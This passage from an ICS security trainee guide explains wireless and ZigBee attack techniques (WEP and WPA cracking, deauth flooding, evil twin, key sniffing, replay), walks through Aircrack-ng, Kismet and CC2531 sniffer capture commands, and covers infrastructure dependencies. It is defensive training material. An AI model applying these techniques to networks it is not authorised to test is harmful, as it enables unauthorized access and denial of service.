software we will use, however, will gather that name from the clients if the access point is not
broadcasting it.
There are two sections to this screen. The upper section is a representation of the access points in the
area. The lower section is a representation of the clients in the area. That is, the lower section of the
BSSID is the access point. The station is the clients’ MAC address. And then we see all the other
columns: power, rate, lost packets, received packets, etc. The final column shows the name of the
access point the client is connected to.
NOTE: APs that are not broadcasting the ESSID (Extended Service Set ID) or the name are not
showing in the screen. If there was an access point that was not broadcasting its name, it would
show up as another access point with all the other column data except for ESSID – which would
show you a length for the number of characters in the name, if discernable.
IEEE 802.11[x] support tools
Tools will capture data for:
 IEEE 802.11[b,g,n] @ 2.4 GHz
 IEEE 802.11[a,n,ac] @ 5.8 GHz
NOTE: There is growing support for IEEE 802.11ac due to some hardware with the correct
chipset.
Wireless threats
There are several different ways in which an attacker can access your network. Let’s cover some of
those attack types.
 _______________________________________
 _______________________________________
 _______________________________________
 _______________________________________
 _______________________________________
 _______________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
79 | P a g e
WEP attack
If an access point is configured with WEP, then it will literally be minutes before it is broken into by an
attacker. WEP has been deprecated for many years.
If the Wi-Fi access point is very popular, all the attacker has to do is sit and listen for what is called the
initialization vector packets. After the attacker collects enough these IV packets, they run a cracking
program that will use statistical analysis to derive the WEP encryption key. Then all that’s left to do is to
login to the victim’s Wi-Fi access point.
If the access point is not very popular and not many people access it, the attacker can then collect the
right packets and force the access point to deliver the number of IV packets required to crack the
encryption key.
So, the way to do this is to force an unsuspecting user to disconnect from the Wi-Fi access point by
sending a de-authentication packet, which will force the unsuspecting Wi-Fi user to handshake with the
access point again, which generates another set of ARP packets that can be used by the attacker to
generate more IV packets. The attacker will send an enormous number of artificially generated ARP
packets to the access point, which then causes the IV to be generated. This process can be automated
so that it only takes a few minutes to collect enough data to decrypt the key. Once there is enough IV
data, it is literally seconds for the decryption of the key to take place.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
80 | P a g e
WPS attack
This attack type only requires WPS beacon. Typically, the WPS beacon is broadcast when the button
on the Wi-Fi access point is pressed.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
81 | P a g e
Wi-Fi de-authentication DoS
A simple Denial-of-Service (DoS) attack. The attacker broadcasts de-authentication packets to each
Wi-Fi client trying to connect to the AP. The de-authentication (deauth) packet forces the user to
disconnect from the AP and to reauthenticate. The packet is a spoof that looks as if it came from the AP
but is in fact from the attacker. Since the packets are continuously broadcast, the users cannot maintain
a connection to the AP. This would allow an attacker sole access to the AP.
Simple devices, such as the Raspberry Pi and ESP 8266, can be configured to spew deauth packets as
the MAC address of each user is learned. The packets can also be broadcast to all clients by NOT
specifying a specific address when using aireplay-ng, making the attack even more simple and easy to
execute. Problem is, the broadcasts deauth the attackers as well.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
82 | P a g e
Evil twin (Man-in-the-Middle) attack
A Wi-Fi AP could be configured to look like others in the network. The MAC address could be
duplicated to look like the real thing. The victim will attempt to connect to the access point to establish a
connection. When the connection is attempted, the “Evil Twin” will take the victim’s credentials and
send them on to the intended access point and establish a connection for themselves, as well as a
connection for the victim. The victim thinks they have a connection to the real network. In reality, the
victim is connected to the Evil Twin, opening all connection elements for the attacker.
The list of things in the bottom-left allow the bad guy to steal passwords, access corporate networks,
capture documents, launch other attacks, and a host of other things.
Another reason the victim will connect to the Evil Twin before it connects to the intended access point is
due to the power level of the Evil Twin. The Evil Twin will be configured so it broadcasts at a higher
power level, leading victims to choose the attacker’s access point because it the victim believes it is
nearer with a better signal.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
83 | P a g e
WPA/WPA2 handshake attack
The WPA or WPA2 attack is very straightforward and simple. All that is required is to collect the WPA
handshake that occurs when a user connects to the Wi-Fi access point.
If the attacker cannot get the WPA handshake by just listening, the attacker can send a deauth packets
to force the user to disconnect and then reconnect – a process that will expose the WPA handshake.
Once the WPA handshake is captured, the attacker can go away and do some decryption on the WPA
handshake at home or wherever there are computing resources.
If the WPA password is very weak, then it will be a matter of seconds or minutes to crack the
handshake – especially if the password is a dictionary word or a password found in a common
password list. If the password is strong or long and complex, this attack becomes quite difficult and
would require significant computing power.
Once the WPA password is cracked, it is just a matter of logging into the access point and accessing
resources on that network.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
84 | P a g e
WPA2 Key Reinstallation AttaCK (KRACK)
This attack came out in 2017 and was a big surprise to the Wi-Fi community. We thought our WPA2
configured Wi-Fi access points were very secure before this attack strategy. It is a simple and
straightforward attack, and surprisingly it did not come out sooner. Again, it is an attack on the 4-way
handshake, which exchanges the encryption key. Once the handshake is complete, the key can be
replaced in a new session with a key the attacker prefers instead of the original key. So, it was just a
matter of replacing the original key with a new key because the standard for WPA2 does not enforce
using the key only once. Newly patched Wi-Fi access points will only allow use of the key once.
Some manufacturers have supplied patches to guard against this attack. This includes commercial
grade access points and home access points. Not all WPA2 access points have a patch, and most
access points have not been patched or do not have a patch. Mitigations must be in place to guard
against the attacks of this type, and an organization should measure its risk level and apply the
appropriate protections.
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
_____________________________________________________________
85 | P a g e
ZigBee attacks
IEEE 802.15 standards
 IEEE 802.15.1: WPAN / Bluetooth – No longer managed by IEEE, but now managed by
Bluetooth Special Interest Group.
 IEEE 802.15.2: Coexistence – Task Group to manage coexistence with other protocols in the
same frequency band.
 IEEE 802.15.3: High Rate WPAN – Wide band and millimeter wave technologies.
 IEEE 802.15.4: Low Rate WPAN – Home, office, and building automation technologies, such as
ZigBee and ISA100.
 Task Group 5: Mesh Networking – Task group to address mesh network architectures of this
family of standards.
 IEEE 802.15.6: Body Area Networks – Medical or wearables area network standards that are
worn on or attached the body.
 IEEE 802.15.7: Visible Light Communication – optical transmission technology.
 IEEE P802.15.8: Peer Aware Communications – infrastructure less technology.
 IEEE P802.15.9: Key Management Protocol – Key security and handling.
 IEEE P802.15.10: Layer 2 Routing – Particularly in 802.15.4 networks.
Source: http://en.Wikipedia.org/wiki/IEEE_802.15
IEEE 802.15.4 protocol technologies

6LowPAN – IPv6 over Low Power Wireless Personal Area Networks.
Thread – IPv6-based, low power mesh networking technology for IoT products,
intended to be secure and future-proof.
ISA100.11a – Wireless Systems for Industrial Automation: Process Control and

Related Applications. Honeywell and others use this technology.
MiWi – Proprietary wireless protocols designed by Microchip Technology that use

small, low-power digital radios based on the IEEE 802.15.4 standard for wireless
personal area networks (WPANs).
WirelessHART – Wireless sensor networking technology based on the Highway

Addressable Remote Transducer Protocol (HART). Basically, a wired protocol going
over wireless.
ZigBee – IEEE 802.15.4-based specification for a suite of high-level communication

protocols used to create personal area networks with small, low-power digital radios,
such as for home automation, medical device data collection, and other low-power
low-bandwidth needs, designed for small scale projects that need wireless
connection.
86 | P a g e
ZigBee roles
____________ __________ – Is used to authenticate devices joining the network. A ZigBee network is
not required to implement a Trust Center node but using a Trust Center enhances the Confidentiality,
Integrity, and Availability of the ZigBee PAN.
_________________ – A ZigBee PAN cannot exist without the Coordinator, which controls and
connects to all nodes in the network, unless there is a router that is bridging to another PAN. Each PAN
must have one and only one Coordinator.
___________ – Basically just relays messages from one set of ZigBee devices to another. Is also used
to bridge PANs, which is typically seen in a mesh network involving multiple PANs. Messages can be
routed between PANs or between Coordinators and End Devices or between End Devices, depending
on the implementer's network design. Power levels are used by the network, usually dynamically, to
determine a route between two nodes.
______ ___________ – Basically a reduced functional device relative to network functions, but
functional in the aspect of working with connected equipment. These are the devices that are at the
‘End’ of the network and provide information to the coordinator or other devices on the network.
ZigBee network topologies
The three network topologies of a ZigBee network are:
1. _____________________
2. _____________________
3. _____________________
The most common is the Star Network due to its simplicity to implement, especially in-Home
Automation and Office environments.
The Mesh Network topology uses routers to extend the reach of the network beyond the peer-to-peer
aspects of the Star Network. Routers can communicate with anything on the network, so the number of
nodes is limited by the number of routers designed into the network. Routers communicate with other
routers, unlike the Cluster Tree Network.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
87 | P a g e
In the Cluster Tree Network, router nodes are only allowed to communicate with the Coordinator and
End Devices – not other routers, which is part of the basis for Mesh Networks. Cluster Trees allow for a
simplified traversal of the network over Mesh Networks, which may have numerous routes between two
nodes. On the other hand, a Mesh Network would allow an alternate path, if needed.
The Trust Center node is not shown, but the Coordinator typically plays the Trust Center role.
Source: http://ZigBee.pbworks.com/f/ZigBee+Topologies.png
ZigBee attacks
End Device Sabotage. A typical ZigBee end device runs on batteries in low power mode. In this mode
the ZigBee end device can run for years, operating only when need dictates. As a result, a ZigBee
router or a ZigBee coordinator will be impersonated, forcing the ZigBee end device to wake up more
often, draining the batteries and causing the system to fail ahead of schedule due to a lack of battery
power.
Network Key Sniffing. Many ZigBee networks are set up without encryption. A successful attack
would just be a matter of sniffing the network with Wireshark and extracting the network keys or the
PAN ID from whatever devices are communicating on the network, since all the devices share the
same key or PAN ID.
Replay Attack. Especially in an unencrypted network, this type of attack could be achieved by
recording the packets being transmitted and replaying them.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
88 | P a g e
Again, with an open PAN (which means no encryption has been configured for personal area) the
network can be easily penetrated, and new devices installed.
The maximum frame counterattack occurs when a rogue device starts sending frames within the
network and the maximum frame counter is exceeded. The device with the maximum frame count
exceeded will reject any new network frames, causing a denial-of-service condition. There is also a
second use of the frame count that is used as a sequence ID, which in some case can be predicted.
https://pdfs.semanticscholar.org/cf51/0927a408d9d4a09fd1465d652b574f39f92d.pdf
https://research.kudelskisecurity.com/2017/11/21/ZigBee-security-basics-part-3/
ZigBee key eavesdropping

 New end device joins the PAN
 Encryption Key distributed via wireless in cleartext
 Key captured by eavesdropper
When new nodes are added to a
network, encryption keys are
provisioned, or other settings are
set/changed over a wireless connection,
an eavesdropper can capture packets
containing the encryption key – or by
statistical analysis, derive the key in a
fashion similar to a WEP Wi-Fi attack.
The encryption key can then be used to
provision a nefarious node.
ZigBee replay attack
 Unencrypted network
 Packets captured
 Packets replayed by attacker
In an unencrypted network, and in some
ZigBee networks, packets can be captured and
replayed. Encryption is not on by default in
many ZigBee products as there is no provision
in the standards to do so. The mitigation is to
provision over a wired connection, or use a
Trust Center, which will perform authentication
depending on the configuration of the network
architecture.
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
89 | P a g e
RF capture tools
Wi-Fi monitoring hardware
Wi-Fi monitoring hardware is a small subset of all Wi-Fi hardware
devices available. Most of the hardware built into laptops will not go into
monitor mode, meaning an external dongle with a compatible chipset is
required. There are open-source drivers available that have been
modified to allow most Linux installations and a few Windows
installations. The majority of installations are Linux on a wide variety of
platforms, from Raspberry Pi to high-end laptops to portable units.
The most important thing to note is the chipset. There are a few
compatible chipsets:
 Atheros Source: https://www.wirelesshack.org/best-
kali-linux-compatible-usb-adapter-dongles-
 Ralink 2016.html
 Realtek
The images above show compatible devices widely known to work. The TP-Link WN722N Version 1 is
not the only version that works, but it works best and has a very low price point, although only in
2.4GHz. The manufacturer changed the chipset in Version 2 and later, and no longer works with Linux.
Some example Wi-Fi hardware:
 TP-Link WN722N V1 only
 Alfa AWUS036NH
 Panda Wireless PAU09
Aircrack-ng suite of tools
As you can see Aircrack-ng is a suite of 19 or so tools that perform various tasks, such as monitoring,
dumping, and cracking. We are only going to discuss the two tools shown in red: airmon-ng and
airodump-ng.
 airbase-ng  airodump-ng
 aircrack-ng  airolib-ng
 airdecap-ng  airserv-ng
 airdecloak-ng  airtun-ng
 airdriver-ng - REMOVED in 1.2 rc 1  besside-ng
 airdrop-ng  dcrack
 aireplay-ng  easside-ng
 airgraph-ng  packetforge-ng
 airmon-ng  tkiptun-ng
 wesside-ng
______________________________________________________________
______________________________________________________________
______________________________________________________________
______________________________________________________________
90 | P a g e
Aircrack-ng uses
 Monitors/captures Wi-Fi packets sent over the air
 Forges fake packets
 Performs fake authentication and keep-alives
 Spoofs APs
 Attacks APs and Wi-Fi clients
 Brute-force decrypts encryption keys or statistically uncovers them
 Creates CSV and PCAP files for later inspection
 Replays fake ARP packets to force AP to reveal #data
 Reveals hidden SSIDs by various methods
 Forces clients to disconnect by de-authentication
Monitor mode
Sets the mode of the Wi-Fi interface into ‘monitor’ mode, where every packet can be seen by the
interface on every network, but it is not connected. ‘Promiscuous’ mode allows capturing packets after
a connection is made to a network.
Once a Wi-Fi interface is in monitor mode, the interface can be used by the listed tools without the tools
needed to do configuring. So once Aircrack puts a Wi-Fi interface into monitor mode, Kismet and
Wireshark can use the interface to perform more analysis tasks.
Monitor mode allows not only monitoring, but packet injection. It must be stopped in order to return the
Wi-Fi hardware to ‘normal’ use.
airmon-ng
Monitor Mode with airmon-ng
The first step is checking if there are interfaces already in monitor mode. The tool will let you put an
interface into as many duplicates of monitoring mode as you want, but only one will work some of the
time. Most of the time, the interface gets bound up and will not operate. The command will not show
any interfaces until conflicting processes are shut down, as in Network Manager.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
91 | P a g e
Monitor Mode with airmon-ng check
We can check for troublesome processes by running airmon-ng check. It will find and display the
process that give the tools the most trouble. The most common is Network Manager as it is actively
looking to create connections on available interfaces, wired or wireless. If Network Manager is not shut
down, the tools will run intermittently and then shut down since they will be taken out of monitor mode.
The process could be shut down or killed using airmon-ng as shown below or killed manually by root.
Monitor Mode with airmon-ng check kill
airmon-ng check kill will search and find the troublesome processes and kill them. All the
commands must be run as root. In fact, executables will check to ensure commands are being run by
the root user and warn the user to do so. Run both commands repeatedly until no processes or minimal
processes are running. The second window shows the check command is running and finds no
troublesome processes.
Monitor Mode with airmon-ng
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
92 | P a g e
A second run of airmon-ng without parameters show interfaces available to be put into monitor mode.
None have been put into monitor mode yet. We are just prepping the system to do so.
Monitor Mode with ifconfig –a
Another check with ifconfig-a to verify we have an interface named wlan0. We are not in monitor mode
yet.
Monitor Mode with airmon-ng start
To put the interface in monitor mode, use airmon-ng start wlan0. This will put the interface into monitor
mode and rename it with the word ‘mon’ embedded in the name. As you can see in this example, wlan0
is morphed into wlan0mon. The new name is used for all tools and commands.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
93 | P a g e
Monitor Mode Complete
Another run of ifconfig verifies the interface has been put into monitor mode. Sometimes, the interface
remains unchanged and a new interface is created. Most of the time this will not work, and the steps
must be started over.
First capture with airodump-ng
Capture with airodump-ng
This is our first session with airodump-ng. This tool will allow us to do the capture of packet data from
the Wi-Fi interface.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
94 | P a g e
A few things to note:
 BSSID – This is the MAC address of the Access Point (AP). Basic Service Set ID.
 PWR – The amount of power relative to 1 milliwatt. If an access point was broadcasting at 1
milliwatt by the time the energy made it to the monitoring interface, the power is measured and
a number is derived, which will be less than 1 milliwatt due to the distance traveled. If there was
another access point half the distance away, but broadcasting at half the power, the
measurement of both APs would be the same. It is not exactly half, but that is what the
measurement of PWR means and how it is calculated in Aircrack-ng.
 Beacons – The number of beacon packets sent by the Aps.
 #Data – The amount of data sent by the AP for some client or other service. This also includes
initialization vectors that can be used to decrypt or derive the key from WEP-based APs.
 #/s – Data packets received per second.
 CH – The channel where the AP is broadcasting. Where it says ‘CH 8’ this is the channel the
interface is listening to at the moment if it is channel hopping – which, when hopping, it does
about three times per second.
 MB – The speed at which the AP is configured. Not the speed the packets are traveling. This is
in megabits per second.
 ENC – The encryption type: WEP, WPA, WPA2, WPS, OPN.
 CIPHER – The encryption/security method.
 Auth – PSK is for Pre-Shared-Key such as that used in WPA2. WEP does not usually show
anything here.
 ESSID – The name of the access point. Non-broadcasting APs do not broadcast their ESSID
but broadcast the length. Extended Service Set ID.
 If there was a GPS location, it would show up to the right of the date and time. Other messages
appear in this area, such as the WPA Handshake message.
NOTE: This screen doesn’t show it, but at the bottom there would be a set of addresses
showing the client and station they are connected to, along with the name of the client.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
95 | P a g e
First capture with Kismet and Wireshark
When the Wi-Fi interface is in monitor mode, various applications such as Kismet and Wireshark can
also capture packets.
Try these commands:
 Kismet
$> kismet -c wlan0mon
 Wireshark
$> wireshark -k -i wlan0mon
For Kismet: The –c switch is the capture device.
For Wireshark: The -k is the switch for running the capture immediately.
The -i is the switch for the interface we are using.
Kismet
Similar to Aircrack-ng functionality, Kismet capabilities include:
 Pseudo graphical interface in current stable version. Web interface in the development version.
 Does not contain pen-testing capability
 Client-Server and plug-in architecture
 Output to various file formats
 Capability to monitor other protocols and technology (e.g., Bluetooth, 433 MHz, etc.) based on
plug-ins
Kismet AP Only View
This is the Kismet screen with all other views turned off.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
96 | P a g e
Kismet configuration
 Kismet configuration is all contained within a text file
 Unlike the Aircrack-ng suite, most execution parameters are specified within the Kismet
configuration file, which is located at /etc/kismet/kismet.conf
 Different configuration files can be specified on the command line
Kismet configuration is done mostly with the Kismet configuration text file. This can come in handy
when specifying numerous hosts to avoid or filter. Different configuration files can be specified on the
command line.
Kismet filtering
Kismet filtering is much more flexible than airodump-ng. The first filter_tracker defines a filter to
show AP for the given MAC Address and capture its data. The filters with the ‘!’ character are negations
on the MAC address, meaning leave this one out of the captures.
Kismet channel graph

The Kismet Channel Graph shows the activity of the APs in the area. The top (amber) shows signal
activity and on what channels. It is kind of a crude spectrum analyzer. The lower graph (green) is the
data and on what channel it is coming through. As you can see, there is activity on Channel 1 and on
Channels 6 and 11. Further down there is activity on Channel 36, Channel 116, 132 and 157. This is a
quick way to see activities on channels actively doing something, which could show activity that should
not be in the area.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
97 | P a g e
Mobile analyzers
There are several available applications for Android systems that can be used to evaluate nearby
wireless signals. These tools offer a useful graphical representation of different signals and their
corresponding strength from the perspective of the analyzer.
 Wi-Fi Analyzer – A widely used Wi-Fi analyzing application for Android
 OpenSignal – A Wi-Fi and phone signal analyzer that includes geographical maps with signals
imposed
 Wi-Fi Monitor – Microsoft produced Wi-Fi analyze
Texas Instruments packet sniffing instructions

IEEE 802.15.4 packet capture
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
98 | P a g e
IEEE 802.15.4 capture commands
 Running the first command hops the channels, puts the packets in the file and shows which
channels have activity on the screen.
$> ./cc2531sniffer.py -d -z -p mycapture.pcap
 The second command starts capturing data on Channel 13 and redirects packet data to a
filesystem pipe. The scripts prompt for an action. Type ‘s’ to start the process. Run the next
command since this command stops any data from displaying on the screen. In order to see the
data, the next command must be run.
$> ./cc2531sniffer.py -c 13 -f /tmp/sniffpipe
 The third command is run in another terminal on Wireshark, telling it to start capturing data from
/tmp/sniffpipe, and then immediately display results in Wireshark. IEEE 802.15 data will then be
displayed as it is captured.
$> Wireshark -k -i /tmp/sniffpipe
 Ensure Wireshark is interpreting data correctly by going to Edit->Preferences->Protocols->IEEE
802.15.4->FCS Format=TI CC25xx metadata. If this is not set, the data will be interpreted only
as IEEE 802.15.4. ZigBee network stack will be ignored.
Wireless packet analysis - ZigBee
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
99 | P a g e
IEEE 802.15 packet analysis
 Analyze IEEE 802.15 packets
 Identify open vs. secured network
 Identify Coordinator versus End Devices
ZigBee assessment tools

Here is a set of tools that could be used to capture and view ZigBee packet data.
TI Packet Sniffer, which only works in MS Windows, was created to help the developer build messaging
between different TI components and different communications protocols. ZigBee is one of many
protocols that could be sniffed and reviewed. It requires knowledge of the channel and the protocol
being used but can be used to decode ZigBee packet data.
Because we are using the TI CC2531 USB, only 2.4 GHz traffic is being monitored. Messaging in the
900 MHz band could be monitored with the TI CC1111 USB-dongle. As a reminder, there are few
implementations in the 900 MHz range with standard ZigBee. Most applications are in the 2.4GHz
range amongst the many ZigBee device manufacturers.
GNU Radio can also be used to monitor ZigBee using a GNU Radio package with associated flow
graphs by the name of gr-ieee802-15-4.
It can be found here: https://github.com/bastibl/gr-ieee802-15-4.
There are many CC2531 Python sniffer scripts available online that could be downloaded and used at
the command line. We have two, one for 2.4 GHz and 900 MHz Script name is cc2531sniffer.py with
many switches.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
100 | P a g e
To search for the channel that 802.15.4 is broadcasting on with the CC2531 dongle, use:
./cc2531sniffer.py –d –z
This will hop channels and display a flag for found channels across all channels.
Once a channel has been determined, run:
./cc2531sniffer.py –d –c [THECHANNEL] –p [PCAPFILE] –D DEBUG –L
[LOGFILE]
Example: ./cc2531sniffer.py –d –c 16 –p myzcapture.pcap –D DEBUG –L sniff.log
Open the PCAP file in Wireshark to analyze.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
101 | P a g e
ZigBee security – false
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
102 | P a g e
ZigBee security – true
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
103 | P a g e
ZigBee transport key
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
104 | P a g e
Wireshark packet analysis - Wi-Fi
A packet analysis tool that can be used for additional Wi-Fi
packet analysis. Wireshark is mainly used to analyze packets
not previously analyzed in Aircrack-ng or Kismet, such as de-
authentication packets. Wireshark is a little-more difficult to determine security level than other tools but
can be used to capture packets directly on a monitor-mode interface and analyze data within PCAP
files.
Wireshark Wi-Fi beacons
In the image below, the red box within the display filter shows us how to filter on Beacons if there are
numerous packets in the file or stream.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
105 | P a g e
Wireshark Wi-Fi privacy bit
The Privacy bit is set on all Beacon types and encrypts the data. If it is not set, it is likely an OPEN
access point.
Wi-Fi WEP identification

For WEP, the RSN field is not set and there is no WPA field either.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
106 | P a g e
Wi-Fi WPA2
For WPA2, the RSN field exists along with the WPA Information packet. The Privacy bit must also be
set.
Wireshark Wi-Fi de-authentication

De-authentication packets are rarely sent relative to the amount of data and other packets. When there
is an attack, the number of de-authentications may rise significantly and have targeted hosts in the
packet data. De-authentication packets are usually not visible in the other Wi-Fi tools such as Aircrack-
ng or Kismet.
The subtype is noted to be subtype 12. This information can be found in the inclusive documentation.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
107 | P a g e
Wireless Recap
 Does the organization maintain an inventory of authorized wireless access points connected to
the wired network?
 Is the use of personally owned, removable media prohibited on the system?
 Does the organization use wireless intrusion detection systems (WIDS) to identify rogue
wireless devices and detect attack attempts and successful compromises?
 Are network vulnerability scanning tools configured to detect and alert on unauthorized wireless
access points connected to the wired network?
 Is each mobile device connection to the system authorized?
 Are requirements for mobile device connection to the system enforced?
 Are unauthorized remote connections monitored including scanning for unauthorized mobile or
wireless access points on a defined frequency and action taken if unauthorized connections
discovered?
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
108 | P a g e
 No communication encryption - Encryption is not used to protect information passed
within the system.
 Wireless access control - There is no mechanism to verify or limit connections to
company-owned devices.
 Direct access to control system via Wi-Fi – Wi-Fi connected devices have the ability to
control and make changes to the ICS.
____________________________________________________________
____________________________________________________________
____________________________________________________________
____________________________________________________________
109 | P a g e
ICS Dependencies
Internal and external dependencies
TRAINEE GUIDE
Outcomes
In this section we will delve into infrastructure dependencies, both internal and external to ICS
systems. This brings us to Step 4 within our process, Determine ICS Dependencies.
110 | P a g e
Determine ICS dependencies
Infrastructure and their dependencies
Infrastructure: _____________________________________________________________________
__________________________________________________________________________________
__________________________________________________________________________________
_____________________________________
Dependency: ______________________________________________________________________
__________________________________________________________________________________
_________________________________________________
Topics covered in this module:

Interdependency: Intradependency:
 What is the big picture?  What to focus on in your business or
facility?
 How do infrastructure sectors fit into
this?  What is the cyber focus?
 How does your site or asset look  What can we do to understand and
from the outside? plan for dependencies?
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
111 | P a g e
Critical Infrastructure sectors
Lifeline sectors
Of the sixteen, four are essential to the operation of the other critical infrastructure sectors. These are
called “Lifeline” sectors:
• __________________________________
• __________________________________
• __________________________________
• __________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
112 | P a g e
Every critical infrastructure sector relies on one or more of the lifeline sectors (Water, Energy,
Communications, and Transportation) to maintain functionality. But that reliance upon those sectors is
also true of each of the lifeline sectors themselves. For example, the Energy and Communications
sectors have a foundational role in the operations of other sectors’ systems. But both Energy and
Communications services are also reliant on each other to maintain that baseline functionality – in the
case of the Energy Sector, Industrial Control System and vulnerability management is dependent on
reliable network service; for the Communications Sector, electricity underpins the ability for those and
other network capabilities. In addition, the Energy Sector is reliant upon both the Water and
Transportation sectors, for cooling and the transit of precursor materials, respectively.
Dependency
What does your company depend on from outside? Could be multiple sectors listed above, including
but not limited to the Lifeline sectors.
Dependency types
Cross-Sector Dependency
A dependency between infrastructure from different sectors (e.g., water and energy).
Interdependency
The products or services provided to one infrastructure by another external infrastructure that are
necessary to support its operations and functions.
Interdependency
The products or services provided to one infrastructure by another external infrastructure that are
necessary to support its operations and function.
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
113 | P a g e
Cross-Sector Dependency
A dependency between infrastructure from different
sectors (e.g., water and energy). Wastewater
Natural Gas
Treatment
Facility
How does your company depend on other companies Plant
and how do they depend on you?
Interdependency
The products or services provided to one
infrastructure by another external
infrastructure that are necessary to support
its operations and function.
Each layer beyond the initial layer of
utilities, systems, and people may
comprise of a system in and of itself that
needs to be identified by the boundaries.
Intradependency
The interactions among internal operations,
functions, and missions of the infrastructure.
Internal dependencies are the internal links among
the assets constituting a critical infrastructure (e.g.,
an electric generating plant that depends on cooling
water from its own onsite water well).
• How do we evaluate the big picture and then
filter down to the small picture?
• How are the Assets (Functions) laid out?
 Use your network map (or
discovery).
 Discuss with site engineers to
determine flow of Functions.
• What are the company’s business (ICS) process functions?
 List main systems and determine what function (or process) they provide.
 List of sub-systems and determine what function (or process) they provide.
 Validate your network/asset inventory.
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
114 | P a g e
• What are the company’s auxiliary (ICS) process functions?
 May or may not be directly related to main business process.
 Some examples: Security systems, HVAC, Power (main and backup), Wireless.
Business (ICS) process function example:
Here is an example of a Business (ICS) Process
function. We will be looking in the Headworks
building and process around it.
See Appendix B for additional information related to
the Deer Island Treatment Plant Main
Control
Auxiliary (ICS) Functions Building
 What are the other factors around
the process?
 How do you determine what is Intradependent
in the Headworks building? Ask:
o What is located in the main control
building?
o HVAC controls?
o Operation stations?
o Backbone for the control network?
o Historians and data transfer from the ICS network to the business network?
Business ICS Process Functions
 How do you determine business process connectivity?
 Functions that are directly part of the ICS Network.
o Will depend on you site.
o Parts of the site process that control in the ICS and monitor.
 Some connectivity examples that Deer Island could have:
o PLC
o RTU
o DCS computers
o Network switches
o Firewalls
o Network traffic flow
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
115 | P a g e
Business (ICS) process functions (continued)
Let’s look closely at this network diagram. If this were the setup in Deer Island, what would the Process
area be dependent on?
Auxiliary (ICS) functions (continued)

 How do you define Auxiliary Functions?
o Functions that are not directly part of the ICS network.
o Depends on your site.
o May include items attached to the Business (ICS) Process Function but on separate
networks.
o Are there any Dependencies for this equipment?
 Some examples that Deer Island could have.
o Map out what they have.
o Talk to Site Security Specialist
o Talk to Site engineers
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
116 | P a g e
Using the same diagram as seen above, what would the auxiliary area be dependent on? What servers
would need to talk to each other?
Understand criticality and risk
Criticality: ____________________________________________________________________
Risk: _________________________________________________________________________
 Focus on Risk and Criticality inside your Asset (functions).

 Evaluate the Risk and Criticality on both an Interdependency and Intradependency level. The
main purpose is to focus on anything that falls into a high category, depending on your site.
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
117 | P a g e
Use Case – Carroll County Emergency Power
Extended power outages can threaten the public’s
safety, limiting their ability to heat or cool their homes
and store and cook food. Gasoline generators are a
common and reliable source of backup power, but
most people don’t store extra gasoline in case of an
emergency. What would happen if, during an
emergency event, fuel service stations lost power and
gasoline pumps failed?
Through a grant program, fuel stations can apply for
grants which can help offset the costs for purchasing
and installing portable and fixed generators, as well as
backup battery units. So, people can get fuel for portable generators.
When the station upgrades are complete, residents will be able to secure fuel needed to temporarily
power their homes, or even fuel their cars should the county issue an evacuation order.
Dependencies Exercises 1 and 2

Take any notes from the online activity:
______________________________________________
______________________________________________
_______________________________________________________
________________________________________________________
________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
118 | P a g e
Dependencies Recap
 Which systems and their supporting infrastructure are dependent on a properly functioning
control system?
 Are multiple control systems involved?
 Are physical devices and systems within the organization inventoried?
 Are software platforms and applications within the organizations inventoried?
 Network - Connections to systems
 Physical Access – Enforcement
 Configuration - Change Management
 Network - Wireless and Radio
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
_______________________________________________________________
119 | P a g e
Step 5 – Assess Risk
to Business
Operations security (OPSEC), opensource
intelligence (OSINT), adversarial risk, Mitre
Att&ck Framework, and risks to supply chain
TRAINEE GUIDE
Outcomes
In this section we will discuss risk to business. This will include discussing how attackers can obtain
information to infiltrate your systems.
120 | P a g e
Evaluate risk using OSINT and OPSEC -
Threats to ICS
 Adversaries leverage public information to develop attack
paths and techniques targeting company information
 Successful attackers learn about their targeted
organization’s security posture through profiling and
footprinting
 There is generally a TON of information that can be found
